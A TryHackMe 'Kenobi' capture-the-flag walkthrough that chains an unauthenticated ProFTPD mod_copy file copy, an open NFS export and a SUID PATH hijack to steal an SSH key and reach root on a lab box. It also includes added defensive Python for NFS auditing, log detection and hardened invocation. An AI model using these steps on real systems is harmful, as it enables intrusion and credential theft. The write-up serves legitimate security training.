
TryHackMe: Kenobi


Enumeration

Let’s start by enumerating open ports:

root@osboxes:~/Documents/Kenobi# cat scan.txt 
[*] OS based on TTL
Linux
[*] TCP Scan
Open ports: 22,21,445,80,139,2049,111,37299,47695,50169,50921
PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         ProFTPD 1.3.5
22/tcp    open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 b3:ad:83:41:49:e9:5d:16:8d:3b:0f:05:7b:e2:c0:ae (RSA)
|   256 f8:27:7d:64:29:97:e6:f8:65:54:65:22:f7:c8:1d:8a (ECDSA)
|_  256 5a:06:ed:eb:b6:56:7e:4c:01:dd:ea:bc:ba:fa:33:79 (ED25519)
80/tcp    open  http        Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/admin.html
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
111/tcp   open  rpcbind     2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100003  2,3,4       2049/udp   nfs
|   100003  2,3,4       2049/udp6  nfs
|   100005  1,2,3      33723/tcp6  mountd
|   100005  1,2,3      39241/udp   mountd
|   100005  1,2,3      50169/tcp   mountd
|   100005  1,2,3      52651/udp6  mountd
|   100021  1,3,4      36429/tcp6  nlockmgr
|   100021  1,3,4      36449/udp   nlockmgr
|   100021  1,3,4      37299/tcp   nlockmgr
|   100021  1,3,4      38700/udp6  nlockmgr
|   100227  2,3         2049/tcp   nfs_acl
|   100227  2,3         2049/tcp6  nfs_acl
|   100227  2,3         2049/udp   nfs_acl
|_  100227  2,3         2049/udp6  nfs_acl
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
2049/tcp  open  nfs_acl     2-3 (RPC #100227)
37299/tcp open  nlockmgr    1-4 (RPC #100021)
47695/tcp open  mountd      1-3 (RPC #100005)
50169/tcp open  mountd      1-3 (RPC #100005)
50921/tcp open  mountd      1-3 (RPC #100005)
Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h40m01s, deviation: 2h53m12s, median: 0s
|_nbstat: NetBIOS name: KENOBI, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: kenobi
|   NetBIOS computer name: KENOBI\x00
|   Domain name: \x00
|   FQDN: kenobi
|_  System time: 2020-08-01T21:39:14-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-08-02T02:39:14
|_  start_date: N/A
[*] Execution time:
	 TTL: 0
	 Furious: 15
	 Nmap: 16
	 Total: 31

Intrusion

Ports 139 and 445 are open, so I dumped the contents of the SMB shares to my local host:

root@osboxes:~/Documents/Kenobi# crackmapexec smb 10.10.110.130 -u "" -p "" -M spider_plus -o READ_ONLY="False"
SMB         10.10.110.130   445    KENOBI           [*] Windows 6.1 (name:KENOBI) (domain:) (signing:False) (SMBv1:True)
SMB         10.10.110.130   445    KENOBI           [+] \: 
SPIDER_P... 10.10.110.130   445    KENOBI           [*] Started spidering plus with option:
SPIDER_P... 10.10.110.130   445    KENOBI           [*]        DIR: ['print$']
SPIDER_P... 10.10.110.130   445    KENOBI           [*]        EXT: ['ico', 'lnk']
SPIDER_P... 10.10.110.130   445    KENOBI           [*]       SIZE: 51200
SPIDER_P... 10.10.110.130   445    KENOBI           [*]     OUTPUT: /tmp/cme_spider_plus
root@osboxes:~/Documents/Kenobi# mv /tmp/cme_spider_plus/10.10.110.130 .
root@osboxes:~/Documents/Kenobi# tree 10.10.110.130/
10.10.110.130/
└── anonymous
    └── log.txt

1 directory, 1 file

There is only one file, log.txt. According to the log, an RSA key pair was generated for the user kenobi and the private key was saved to /home/kenobi/.ssh/id_rsa:

root@osboxes:~/Documents/Kenobi# head 10.10.110.130/anonymous/log.txt 
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kenobi/.ssh/id_rsa): 
Created directory '/home/kenobi/.ssh'.
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /home/kenobi/.ssh/id_rsa.
Your public key has been saved in /home/kenobi/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:C17GWSl/v7KlUZrOwWxSyk+F7gYhVzsbfqkCIkr2d7Q kenobi@kenobi
The key's randomart image is:

NFS is also open (port 2049), so I listed the available exports:

root@osboxes:~/Documents/Kenobi# showmount -e 10.10.110.130
Export list for 10.10.110.130:
/var *
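An export of `/var` to `*` is exactly the kind of entry a defender should catch before an attacker does. The following audit script is an added example for this writeup (not part of the room or the original post): it parses text in /etc/exports format, the file showmount's export list is built from, and flags exports offered to every client, broad system directories, world-writable exports and no_root_squash. The sample exports are constructed; only the `/var *` line mirrors what the target advertised.

```python
"""Audit an NFS export list for entries that expose too much.

Added example for this writeup; it is not part of the room or the original
post. Input is text in exports(5) format; the sample below is constructed,
with '/var *' mirroring the export the target advertised.
"""
import re
from dataclasses import dataclass

# Constructed sample, not copied from the target's /etc/exports.
SAMPLE_EXPORTS = """\
# /etc/exports: filesystems that may be exported to NFS clients
/var *
/srv/share 10.10.0.0/16(ro,sync,root_squash)
/home/kenobi 10.10.110.5(rw,no_root_squash)
/data *(rw)
"""

# Top-level system directories that should never be exported wholesale.
BROAD_PATHS = {"/", "/etc", "/home", "/usr", "/var"}

# host[(opt,opt,...)]: the per-client syntax of exports(5)
CLIENT_RE = re.compile(r"^(\S+?)(?:\(([^)]*)\))?$")


@dataclass
class Finding:
    export: str
    client: str
    issues: list


def parse_exports(text):
    """Yield (path, client, [options]) for every client of every export line."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and blank lines
        if not line:
            continue
        parts = line.split()
        # exports(5): a path with no client list is exported to everyone
        path, clients = parts[0], parts[1:] or ["*"]
        for client in clients:
            match = CLIENT_RE.match(client)
            host, opts = match.group(1), match.group(2)
            options = [o.strip() for o in opts.split(",")] if opts else []
            yield path, host, options


def audit_exports(text):
    """Return a Finding for each (export, client) pair with at least one issue."""
    findings = []
    for path, host, options in parse_exports(text):
        norm = path if path == "/" else path.rstrip("/")
        issues = []
        if host == "*":
            issues.append("exported to any client")
        if "no_root_squash" in options:
            issues.append("no_root_squash: a remote root keeps uid 0 on this export")
        if host == "*" and "rw" in options:
            issues.append("world-writable export")
        if norm in BROAD_PATHS:
            issues.append(f"broad system directory {norm} exported")
        if issues:
            findings.append(Finding(path, host, issues))
    return findings


if __name__ == "__main__":
    for finding in audit_exports(SAMPLE_EXPORTS):
        print(f"{finding.export} -> {finding.client}: {'; '.join(finding.issues)}")
```

Run against the real file with `audit_exports(open("/etc/exports").read())`. Note that the NFS defaults (ro, root_squash) do not make `/var *` safe: anything any service writes under /var, such as the key copied into /var/tmp later in this writeup, becomes readable from every host that can reach port 2049.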

I mounted the remote directory on my local host:

root@osboxes:~/Documents/Kenobi# mkdir var
root@osboxes:~/Documents/Kenobi# mount -t nfs 10.10.110.130:/var ./var/

There is also an FTP service. It runs ProFTPD, which looks suspicious: a search on exploit-db turns up a bunch of exploits, including some for the exact version the target is running.

root@osboxes:~/Documents/Kenobi# searchsploit proftp
---------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                          |  Path
---------------------------------------------------------------------------------------- ---------------------------------
FreeBSD - 'ftpd / ProFTPd' Remote Command Execution                                     | freebsd/remote/18181.txt
ProFTP 2.9 - Banner Remote Buffer Overflow (Metasploit)                                 | windows/remote/16709.rb
ProFTP 2.9 - Welcome Message Remote Buffer Overflow (Metasploit)                        | windows/remote/9508.rb
ProFTPd - 'ftpdctl' 'pr_ctrls_connect' Local Overflow                                   | linux/local/394.c
ProFTPd - 'mod_mysql' Authentication Bypass                                             | multiple/remote/8037.txt
ProFTPd - 'mod_sftp' Integer Overflow Denial of Service (PoC)                           | linux/dos/16129.txt
ProFTPd 1.2 - 'SIZE' Remote Denial of Service                                           | linux/dos/20536.java
ProFTPd 1.2 < 1.3.0 (Linux) - 'sreplace' Remote Buffer Overflow (Metasploit)            | linux/remote/16852.rb
ProFTPd 1.2 pre1/pre2/pre3/pre4/pre5 - Remote Buffer Overflow (1)                       | linux/remote/19475.c
ProFTPd 1.2 pre1/pre2/pre3/pre4/pre5 - Remote Buffer Overflow (2)                       | linux/remote/19476.c
ProFTPd 1.2 pre6 - 'snprintf' Remote Root                                               | linux/remote/19503.txt
ProFTPd 1.2.0 pre10 - Remote Denial of Service                                          | linux/dos/244.java
ProFTPd 1.2.0 rc2 - Memory Leakage                                                      | linux/dos/241.c
ProFTPd 1.2.10 - Remote Users Enumeration                                               | linux/remote/581.c
ProFTPd 1.2.7 < 1.2.9rc2 - Remote Code Execution / Brute Force                          | linux/remote/110.c
ProFTPd 1.2.7/1.2.8 - '.ASCII' File Transfer Buffer Overrun                             | linux/dos/23170.c
ProFTPd 1.2.9 RC1 - 'mod_sql' SQL Injection                                             | linux/remote/43.pl
ProFTPd 1.2.9 rc2 - '.ASCII' File Remote Code Execution (1)                             | linux/remote/107.c
ProFTPd 1.2.9 rc2 - '.ASCII' File Remote Code Execution (2)                             | linux/remote/3021.txt
ProFTPd 1.2.x - 'STAT' Denial of Service                                                | linux/dos/22079.sh
ProFTPd 1.3 - 'mod_sql' 'Username' SQL Injection                                        | multiple/remote/32798.pl
ProFTPd 1.3.0 (OpenSUSE) - 'mod_ctrls' Local Stack Overflow                             | unix/local/10044.pl
ProFTPd 1.3.0 - 'sreplace' Remote Stack Overflow (Metasploit)                           | linux/remote/2856.pm
ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' 'support' Local Buffer Overflow (1)                  | linux/local/3330.pl
ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' 'support' Local Buffer Overflow (2)                  | linux/local/3333.pl
ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' exec-shield Local Overflow                           | linux/local/3730.txt
ProFTPd 1.3.0a - 'mod_ctrls' 'support' Local Buffer Overflow (PoC)                      | linux/dos/2928.py
ProFTPd 1.3.2 rc3 < 1.3.3b (FreeBSD) - Telnet IAC Buffer Overflow (Metasploit)          | linux/remote/16878.rb
ProFTPd 1.3.2 rc3 < 1.3.3b (Linux) - Telnet IAC Buffer Overflow (Metasploit)            | linux/remote/16851.rb
ProFTPd 1.3.3c - Compromised Source Backdoor Remote Code Execution                      | linux/remote/15662.txt
ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit)                               | linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution                                     | linux/remote/36803.py
ProFTPd 1.3.5 - File Copy                                                               | linux/remote/36742.txt
ProFTPd 1.x - 'mod_tls' Remote Buffer Overflow                                          | linux/remote/4312.c
ProFTPd IAC 1.3.x - Remote Command Execution                                            | linux/remote/15449.pl
ProFTPd-1.3.3c - Backdoor Command Execution (Metasploit)                                | linux/remote/16921.rb
WU-FTPD 2.4.2 / SCO Open Server 5.0.5 / ProFTPd 1.2 pre1 - 'realpath' Remote Buffer Ove | linux/remote/19086.c
WU-FTPD 2.4.2 / SCO Open Server 5.0.5 / ProFTPd 1.2 pre1 - 'realpath' Remote Buffer Ove | linux/remote/19087.c
WU-FTPD 2.4/2.5/2.6 / Trolltech ftpd 1.2 / ProFTPd 1.2 / BeroFTPD 1.3.4 FTP - glob Expa | linux/remote/20690.sh
---------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

One of them is a vulnerability that allows copying files on the server, so I downloaded it:

root@osboxes:~/Documents/Kenobi# searchsploit -m 36742
  Exploit: ProFTPd 1.3.5 - File Copy
      URL: https://www.exploit-db.com/exploits/36742
     Path: /usr/share/exploitdb/exploits/linux/remote/36742.txt
File Type: ASCII text, with CRLF line terminators

Copied to: /root/Documents/Kenobi/36742.txt

The CVE file contains information about how to exploit it (you can read it in the browser too, at the URL shown above).

We already know that we have access to /var through NFS and that there is a private SSH key at /home/kenobi/.ssh/id_rsa, so we just copy it into /var with the SITE commands:

root@osboxes:~/Documents/Kenobi# rlwrap nc 10.10.110.130 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.110.130]
site help
214-The following SITE commands are recognized (* =>'s unimplemented)
 CPFR <sp> pathname
 CPTO <sp> pathname
 HELP
 CHGRP
 CHMOD
214 Direct comments to root@kenobi
site CPFR /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
site CPTO /var/tmp/id_rsa
250 Copy successful
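The exchange above leaves a clear trace in the FTP server's logs: a SITE CPFR answered with 350, followed by a SITE CPTO answered with 250, from a session that never authenticated. The detection below is an added example for this writeup (not part of the room, the post, or ProFTPD). It assumes ProFTPD's built-in "default" LogFormat, `%h %l %u %t "%r" %s %b`, written through ExtendedLog; the log lines are constructed, with the first session modelled on the exchange above (no USER/PASS before the SITE commands, so the user field is `-`) and a second, benign session from an authenticated user for contrast.

```python
"""Detect SITE CPFR/CPTO copy sequences in ProFTPD access logs.

Added detection example for this writeup, not code from the room, the post
or ProFTPD. Assumes lines in ProFTPD's "default" LogFormat
(%h %l %u %t "%r" %s %b); the sample lines are constructed.
"""
import re

SAMPLE_LOG = """\
10.10.14.7 UNKNOWN - [02/Aug/2020:02:40:09 -0500] "SITE HELP" 214 0
10.10.14.7 UNKNOWN - [02/Aug/2020:02:40:31 -0500] "SITE CPFR /home/kenobi/.ssh/id_rsa" 350 0
10.10.14.7 UNKNOWN - [02/Aug/2020:02:40:44 -0500] "SITE CPTO /var/tmp/id_rsa" 250 0
10.10.14.9 UNKNOWN bob [02/Aug/2020:02:41:10 -0500] "SITE CPFR /home/bob/report.txt" 350 0
10.10.14.9 UNKNOWN bob [02/Aug/2020:02:41:13 -0500] "SITE CPTO /home/bob/backup/report.txt" 250 0
10.10.14.9 UNKNOWN bob [02/Aug/2020:02:41:30 -0500] "SITE CPFR /etc/shadow" 550 0
"""

LINE_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<cmd>[^"]*)" (?P<code>\d{3}) (?P<bytes>\d+|-)$'
)

# Source paths an FTP client has no business copying around.
SENSITIVE_SRC = re.compile(
    r"(^|/)\.ssh/|^/etc/(shadow|passwd|sudoers)|\.pem$|id_(rsa|dsa|ecdsa|ed25519)$"
)
# Destinations other users or services can read (e.g. an NFS-exported /var).
STAGING_DST = ("/var/tmp/", "/tmp/", "/var/www/")


def parse_line(line):
    """Return the fields of one log line as a dict, or None if it does not parse."""
    match = LINE_RE.match(line)
    return match.groupdict() if match else None


def detect_site_copies(log_text):
    """Pair each successful CPFR (350) with the next successful CPTO (250) from
    the same client/user and return the copies, flagged when they look risky."""
    pending = {}   # (host, user) -> source path waiting for its CPTO
    events = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec:
            continue
        parts = rec["cmd"].split(" ", 2)
        if len(parts) < 3 or parts[0].upper() != "SITE":
            continue                      # not a SITE command with an argument
        verb, arg = parts[1].upper(), parts[2]
        key = (rec["host"], rec["user"])
        if verb == "CPFR" and rec["code"] == "350":
            pending[key] = arg            # a failed CPFR (e.g. 550) is never paired
        elif verb == "CPTO" and rec["code"] == "250" and key in pending:
            src = pending.pop(key)
            reasons = []
            if rec["user"] == "-":
                reasons.append("copy issued before authentication")
            if SENSITIVE_SRC.search(src):
                reasons.append("sensitive source path")
            if arg.startswith(STAGING_DST):
                reasons.append("destination in a shared staging directory")
            events.append({"host": rec["host"], "user": rec["user"],
                           "time": rec["time"], "src": src, "dst": arg,
                           "reasons": reasons, "suspicious": bool(reasons)})
    return events


if __name__ == "__main__":
    for event in detect_site_copies(SAMPLE_LOG):
        flag = "SUSPICIOUS" if event["suspicious"] else "ok"
        print(f"{flag}: {event['host']} ({event['user']}) {event['src']} -> {event['dst']} {event['reasons']}")
```

The pre-authentication copy of a `.ssh` key into /var/tmp scores on all three criteria, while bob's copy inside his own home scores on none, and the rejected CPFR of /etc/shadow produces no event at all. On the prevention side, the same signal maps to a configuration fix: the mod_copy module documents a `<Limit SITE_CPFR SITE_CPTO>` block for denying these commands, and an upgrade removes the unauthenticated path altogether.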

Now let’s copy the private key out of the mounted NFS directory, give it the permissions ssh requires and connect:

root@osboxes:~/Documents/Kenobi# cp ./var/tmp/id_rsa .
root@osboxes:~/Documents/Kenobi# chmod 600 id_rsa 
root@osboxes:~/Documents/Kenobi# ssh -i id_rsa kenobi@10.10.110.130
load pubkey "id_rsa": invalid format
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.8.0-58-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

103 packages can be updated.
65 updates are security updates.


Last login: Wed Sep  4 07:10:15 2019 from 192.168.1.147
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

kenobi@kenobi:~$ 

Privesc

I checked for SUID binaries and found an interesting one:

kenobi@kenobi:~$ find / -perm /4000 2>/dev/null
/sbin/mount.nfs
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/newuidmap
/usr/bin/gpasswd
/usr/bin/menu
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/at
/usr/bin/newgrp
/bin/umount
/bin/fusermount
/bin/mount
/bin/ping
/bin/su
/bin/ping6

I checked what /usr/bin/menu does using strings:

kenobi@kenobi:~$ strings /usr/bin/menu | head -n 25
/lib64/ld-linux-x86-64.so.2
libc.so.6
setuid
__isoc99_scanf
puts
__stack_chk_fail
printf
system
__libc_start_main
__gmon_start__
GLIBC_2.7
GLIBC_2.4
GLIBC_2.2.5
UH-`
AWAVA
AUATL
[]A\A]A^A_
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :
curl -I localhost
uname -r
ifconfig

The binary calls the other programs by bare name (curl, uname, ifconfig) rather than by absolute path, so we can do a PATH hijacking attack:

kenobi@kenobi:~$ echo "python3 -c 'import pty;pty.spawn(\"/bin/bash\")'" > ifconfig
kenobi@kenobi:~$ chmod +x ifconfig 
kenobi@kenobi:~$ export PATH=/home/kenobi/:$PATH
kenobi@kenobi:~$ menu

***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :3
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

root@kenobi:~# id
uid=0(root) gid=1000(kenobi) groups=1000(kenobi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)
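To make the mechanism behind that root shell concrete, here is an added example for this writeup (it is not the room's menu binary and not code from the original post) that models, in Python, how a bare command name is resolved through PATH, which PATH elements an unprivileged user controls, and how a setuid helper should invoke its commands instead. The fake filesystem, the writable directories and the absolute paths in the TRUSTED table are constructed or assumed for the demonstration.

```python
"""Model PATH-based command resolution and the hardened alternative.

Added example for this writeup; it is neither the room's menu binary nor
code from the original post. FAKE_FS, USER_WRITABLE and the absolute paths
in TRUSTED are constructed/assumed for the demonstration.
"""
import os

SYSTEM_PATH = "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"

# Constructed: executables present on the box, by absolute path.
FAKE_FS = {"/sbin/ifconfig", "/bin/uname", "/usr/bin/curl", "/home/kenobi/ifconfig"}
# Constructed: directories the unprivileged user can write to.
USER_WRITABLE = {"/home/kenobi", "/tmp"}
# Hardened lookup table: the only commands the helper may run, each by
# absolute path (locations assumed for Ubuntu 16.04).
TRUSTED = {
    "status check": ["/usr/bin/curl", "-I", "localhost"],
    "kernel version": ["/bin/uname", "-r"],
    "ifconfig": ["/sbin/ifconfig"],
}


def resolve(command, path_env, fs=FAKE_FS):
    """First PATH element containing `command` wins: this is what system()
    (via /bin/sh) and execvp() do with a bare name."""
    if "/" in command:                      # a path is used as given, no search
        return command
    for entry in path_env.split(":"):
        candidate = os.path.join(entry or ".", command)   # "" means the cwd
        if candidate in fs:
            return candidate
    return None


def hijackable_entries(path_env, writable=USER_WRITABLE):
    """PATH elements where an unprivileged user could plant a look-alike binary."""
    risky = []
    for entry in path_env.split(":"):
        if entry == "":
            norm = "."                      # empty element: current directory
        elif entry == "/":
            norm = "/"
        else:
            norm = entry.rstrip("/")
        user_controlled = (
            not norm.startswith("/")                       # relative directory
            or norm in writable
            or any(norm.startswith(w + "/") for w in writable)
        )
        if user_controlled:
            risky.append(entry)
    return risky


def privileged_invocation(choice):
    """Build argv/env the way a setuid program should run a helper: absolute
    path from a fixed table, a fixed PATH, a minimal environment and no shell
    in between. Raises KeyError for anything not in the table."""
    argv = list(TRUSTED[choice])
    env = {"PATH": SYSTEM_PATH, "LC_ALL": "C"}
    return argv, env


if __name__ == "__main__":
    attacker_path = "/home/kenobi/:" + SYSTEM_PATH
    print("default PATH  ->", resolve("ifconfig", SYSTEM_PATH))
    print("attacker PATH ->", resolve("ifconfig", attacker_path))
    print("risky entries ->", hijackable_entries(attacker_path))
    argv, env = privileged_invocation("ifconfig")
    print("hardened      ->", argv, env)
```

The argv/env pair from `privileged_invocation` is what a privileged program should hand to `subprocess.run(argv, env=env)` (or execve in C): no shell, no PATH search, and no environment inherited from the caller, so a directory the caller controls never takes part in the lookup. `hijackable_entries` is also a quick check to run on the PATH a setuid or sudo-invoked program actually inherits.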
WRITTEN BY
ITasahobby
InTernet lover